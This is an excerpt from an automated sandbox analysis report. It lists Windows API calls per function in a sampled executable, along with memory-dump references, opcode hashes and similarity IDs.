                                      • GetPropA.USER32 ref: 00440ABD
                                      • SendMessageA.USER32(?,00001944,00000000,?), ref: 00440AE2
                                      • SendMessageA.USER32(?,00001943,00000000,?), ref: 00440AF7
                                      • RemovePropA.USER32 ref: 00440B0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessagePropSend$Remove
                                      • String ID:
                                      • API String ID: 2793251306-0
                                      • Opcode ID: 98508c3e9d79bb3212fd2ae2c32650a6eaec0ba1258c7769647f98e91735da6c
                                      • Instruction ID: c89b0fe541cf7dde9ed864f93de2c00e7d19237f7beae416ceb8af7dae3b0204
                                      • Opcode Fuzzy Hash: 98508c3e9d79bb3212fd2ae2c32650a6eaec0ba1258c7769647f98e91735da6c
                                      • Instruction Fuzzy Hash: 691177795003107EF200AB11AC05FBB739CEB85759F004429FE1596251E27CA95ACBAF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004400F0, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 0044010B
                                      • UnhookWindowsHookEx.USER32(00000000), ref: 00440124
                                      • GetWindowLongA.USER32 ref: 0044013B
                                      • SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 00440165
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
                                      • String ID:
                                      • API String ID: 4187046592-0
                                      • Opcode ID: d9070a7cd65ff2c3448befe2fbc8fbd7171ef581ee0bf51f3b4f66425f8333b2
                                      • Instruction ID: 84bca165df897bd3f65c6e1caffb1f0e071b275131642ef42da4b7d0ffc52013
                                      • Opcode Fuzzy Hash: d9070a7cd65ff2c3448befe2fbc8fbd7171ef581ee0bf51f3b4f66425f8333b2
                                      • Instruction Fuzzy Hash: CE1119B5500700AFD714DB18EC58B67B7E9AB84355F008929F649832B0D734E885CF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004454C5, Relevance: 6.1, APIs: 4, Instructions: 52stringregistryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassInfoA.USER32 ref: 004454E5
                                      • RegisterClassA.USER32 ref: 004454F0
                                      • lstrcatA.KERNEL32(00000034,?,00000001), ref: 00445527
                                      • lstrcatA.KERNEL32(00000034,?), ref: 00445535
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Classlstrcat$InfoRegister
                                      • String ID:
                                      • API String ID: 345206450-0
                                      • Opcode ID: 5a911abe35439fedc478e85b35063dc36883a4b28d769952504e9e71227f38e3
                                      • Instruction ID: 6fc6ab3d266a5d1752e608cfcd99d39eb2a44e527625aaab118b33007cd26da0
                                      • Opcode Fuzzy Hash: 5a911abe35439fedc478e85b35063dc36883a4b28d769952504e9e71227f38e3
                                      • Instruction Fuzzy Hash: DB112571901614BFEF00AF659841BAE7BB8AF05314F00852BF412A7152C778DA048B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004405D0, Relevance: 6.1, APIs: 4, Instructions: 52threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 004405D6
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 004405E3
                                      • UnhookWindowsHookEx.USER32(?), ref: 00440626
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044066B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                      • String ID:
                                      • API String ID: 1197249173-0
                                      • Opcode ID: 593c8fe717b099abc742654879408583769eda46ebebaebd75f053c0f0ceee72
                                      • Instruction ID: 00f3de51f772b12f2b2f72a0797674bb85c2975d1a871e2d4dc8f7e778efc85b
                                      • Opcode Fuzzy Hash: 593c8fe717b099abc742654879408583769eda46ebebaebd75f053c0f0ceee72
                                      • Instruction Fuzzy Hash: 57118530100608AFE730AF65EA48A6673B5EB90316F01447BF65E87621D7B9ACB0CF5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449765, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00449799
                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 0044979F
                                      • DuplicateHandle.KERNEL32(00000000), ref: 004497A2
                                      • GetLastError.KERNEL32(00000000), ref: 004497BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CurrentProcess$DuplicateErrorHandleLast
                                      • String ID:
                                      • API String ID: 3907606552-0
                                      • Opcode ID: 814b8f62384c2fbeac6304deea51b44d196b2ea89e67d0868a4bc23a8bddd975
                                      • Instruction ID: 2e38be2a2c297f566f78e94dc3235bd2b4a2076bdca5851586d0c1c7558476bf
                                      • Opcode Fuzzy Hash: 814b8f62384c2fbeac6304deea51b44d196b2ea89e67d0868a4bc23a8bddd975
                                      • Instruction Fuzzy Hash: 7E01D431700200BBFB10AFAACC8AF5B7B9DDF84751F104526F515CB291DAB4DC009764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00445EA6, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32 ref: 00445EB1
                                      • GetTopWindow.USER32(00000000), ref: 00445EC4
                                      • GetTopWindow.USER32(?), ref: 00445EF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00445F0F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Item
                                      • String ID:
                                      • API String ID: 369458955-0
                                      • Opcode ID: e105e0fb4d5564b5f19d866ba0a83c314ed6d7099a93a93f7be1d2d5cc744fc5
                                      • Instruction ID: 4e0c952f3bd25881490f6ead522ea49f2a255526e88217ff8f9e1fcab5a99914
                                      • Opcode Fuzzy Hash: e105e0fb4d5564b5f19d866ba0a83c314ed6d7099a93a93f7be1d2d5cc744fc5
                                      • Instruction Fuzzy Hash: 94018F36005A1AB7EF222B628C00E9F3B59AF51356F104426FC0091223DB39CE159AEA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00445F1F, Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTopWindow.USER32(?), ref: 00445F2D
                                      • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00445F63
                                      • GetTopWindow.USER32(00000000), ref: 00445F70
                                      • GetWindow.USER32(00000000,00000002), ref: 00445F8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$MessageSend
                                      • String ID:
                                      • API String ID: 1496643700-0
                                      • Opcode ID: 386d8f902f1017d435b64220adcc697db0cc4bbcd19f4b9950acd62fa1037df7
                                      • Instruction ID: 0156151debdae8ec3492d7c75ddd89bc7f2ed4c971156e0bf19d426a838d3860
                                      • Opcode Fuzzy Hash: 386d8f902f1017d435b64220adcc697db0cc4bbcd19f4b9950acd62fa1037df7
                                      • Instruction Fuzzy Hash: C6011E36005A19BBDF126F91DC05EDF3B29EF45351F044416FA0055122C73AC93AEFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044756D, Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Item$EnableFocusMenuNextParent
                                      • String ID:
                                      • API String ID: 988757621-0
                                      • Opcode ID: fc0e464e8a8e8943b128fc476aa8c7f230683c55a6beb2071cd77f77bc1a52f2
                                      • Instruction ID: 9d2b2e5d50156d970f3b7737010b5b533b6169e73f648ba0dcd5c7970c14821d
                                      • Opcode Fuzzy Hash: fc0e464e8a8e8943b128fc476aa8c7f230683c55a6beb2071cd77f77bc1a52f2
                                      • Instruction Fuzzy Hash: F0116171108701AFEB289F21DC59B6BB7B5EF40315F104A2EF14287AB1CB78E846CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440810, Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00440816
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 00440823
                                      • UnhookWindowsHookEx.USER32(?), ref: 0044085A
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 00440899
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                      • String ID:
                                      • API String ID: 1197249173-0
                                      • Opcode ID: fd159f8465ff88b3f65a5c27b4658958d6c432b18b529a1a76338f755d0293ad
                                      • Instruction ID: e64b43909e64fb2d070c8aa3cc4862f3f33bec617a0fa23f51894a9a28f582eb
                                      • Opcode Fuzzy Hash: fd159f8465ff88b3f65a5c27b4658958d6c432b18b529a1a76338f755d0293ad
                                      • Instruction Fuzzy Hash: 60019231500A189FE730AF65EB44A6637B4EB84356F00407BF64E93221D7B5AC61CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B857, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0044B883
                                      • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0044B88C
                                      • wsprintfA.USER32 ref: 0044B8A8
                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0044B8C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClosePrivateProfileStringValueWritewsprintf
                                      • String ID:
                                      • API String ID: 1902064621-0
                                      • Opcode ID: 4772d56c0b8c8ebc557b3ab47f137df3ebd5c65d72db09eb4d9faf18d499cea9
                                      • Instruction ID: 5096a92816ae1159df7c26d585568b6ba144e845e5c15ad2e572a389ad05487d
                                      • Opcode Fuzzy Hash: 4772d56c0b8c8ebc557b3ab47f137df3ebd5c65d72db09eb4d9faf18d499cea9
                                      • Instruction Fuzzy Hash: 29018F72400219ABDB126B64DC09FEB3BACEF04755F044436FA15E60A2E774D914CB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00446553, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetObjectA.GDI32(00000000,0000000C,?), ref: 00446591
                                      • SetBkColor.GDI32(00000000,00000000), ref: 0044659D
                                      • GetSysColor.USER32(00000008), ref: 004465AD
                                      • SetTextColor.GDI32(00000000,?), ref: 004465B7
                                        • Part of subcall function 0044ACAC: GetWindowLongA.USER32 ref: 0044ACBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Color$LongObjectTextWindow
                                      • String ID:
                                      • API String ID: 2871169696-0
                                      • Opcode ID: feb3fe680bc6365230c7ad2b378acea959a5f468b1812fc5eef502c03f13e7ca
                                      • Instruction ID: cdf3ea109c339b1207720942c9d72f829f9205d7df180ad5f7ad02bf1a78e847
                                      • Opcode Fuzzy Hash: feb3fe680bc6365230c7ad2b378acea959a5f468b1812fc5eef502c03f13e7ca
                                      • Instruction Fuzzy Hash: 08014B30200208BBEF219F64FC49BAF3BA4EB02351F154522F906D52F9C734CDA8CA5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044A7FF, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowExtEx.GDI32(?,0042F48D,00000000,?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A810
                                      • GetViewportExtEx.GDI32(?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A81D
                                      • MulDiv.KERNEL32(0042F48D,00000000,00000000), ref: 0044A842
                                      • MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 0044A85D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ViewportWindow
                                      • String ID:
                                      • API String ID: 1589084482-0
                                      • Opcode ID: cb1038ddb76810cabed36e5e7bd15283ebe3585dc991432874dbdf68880c38fa
                                      • Instruction ID: 3736933c803cc12f6b6a3f4e1255a8e399edc31ce3e6a16d17c058ec57f49d16
                                      • Opcode Fuzzy Hash: cb1038ddb76810cabed36e5e7bd15283ebe3585dc991432874dbdf68880c38fa
                                      • Instruction Fuzzy Hash: BAF06972400209BFEB14BBA1DC068BEBBBDFF45310B11842AF851A3171EB71AD609B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044A868, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 0044A879
                                      • GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 0044A886
                                      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044A8AB
                                      • MulDiv.KERNEL32(00000002,00000000,00000000), ref: 0044A8C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ViewportWindow
                                      • String ID:
                                      • API String ID: 1589084482-0
                                      • Opcode ID: 3cbbe98c668a292e28d969f87a768f8eca605d98446189cac795b8973fc5bf74
                                      • Instruction ID: 7c34968ab5ce9fd9e8e89db1fad6978d1bdcc6211f5ed9ff61f13ec077ebfb20
                                      • Opcode Fuzzy Hash: 3cbbe98c668a292e28d969f87a768f8eca605d98446189cac795b8973fc5bf74
                                      • Instruction Fuzzy Hash: 43F06972400209BFEB14BBA1DC068BEBBBDFF45310B11842AF851A3171EB71AD609B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044DAD3, Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysStringLen.OLEAUT32(?), ref: 0044DADD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,0044E85C,00000000), ref: 0044DAF5
                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0044DAFD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,0044E85C,00000000), ref: 0044DB12
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Byte$CharMultiStringWide$Alloc
                                      • String ID:
                                      • API String ID: 3384502665-0
                                      • Opcode ID: 000e05d519f099953e6a5f929d717b7ea7e06750d62c1a9c5e4bbecdc3953320
                                      • Instruction ID: 339457101daa611ffdcb3c9ede53cb01d1760a012422e6ced851854f9c9a4e87
                                      • Opcode Fuzzy Hash: 000e05d519f099953e6a5f929d717b7ea7e06750d62c1a9c5e4bbecdc3953320
                                      • Instruction Fuzzy Hash: 0EF0F8B21062287F92205B67DC4CCEBBF9CEE8B2B6F01452AF548D2111C6759801CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044AD96, Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: TextWindow$lstrcmplstrlen
                                      • String ID:
                                      • API String ID: 330964273-0
                                      • Opcode ID: 3ce39f0237db690a67c3e085ebbab314c35ed9da7ea06969e2a1ef79f4b8e839
                                      • Instruction ID: d159fd11c34e6da770562f6171c22fac6869b6cf0de0363decb2bdc371c77f40
                                      • Opcode Fuzzy Hash: 3ce39f0237db690a67c3e085ebbab314c35ed9da7ea06969e2a1ef79f4b8e839
                                      • Instruction Fuzzy Hash: 65F05E75400118ABEF226F20DC08BDA7B6AEB08392F008162F846D1120D774CD909B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044DA39, Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0044DA5B
                                      • GetTickCount.KERNEL32 ref: 0044DA68
                                      • CoFreeUnusedLibraries.OLE32 ref: 0044DA77
                                      • GetTickCount.KERNEL32 ref: 0044DA7D
                                        • Part of subcall function 0044D9DE: CoFreeUnusedLibraries.OLE32(00000000), ref: 0044DA26
                                        • Part of subcall function 0044D9DE: OleUninitialize.OLE32 ref: 0044DA2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                      • String ID:
                                      • API String ID: 685759847-0
                                      • Opcode ID: 76c8841a61c96e482df5558814c957da457fd9c276d2aa145703ab34968c59ff
                                      • Instruction ID: 95a46eac84c1e509314344388b5ef7e7b0816f16b4b4fc0e9a22a5c5ff7339f8
                                      • Opcode Fuzzy Hash: 76c8841a61c96e482df5558814c957da457fd9c276d2aa145703ab34968c59ff
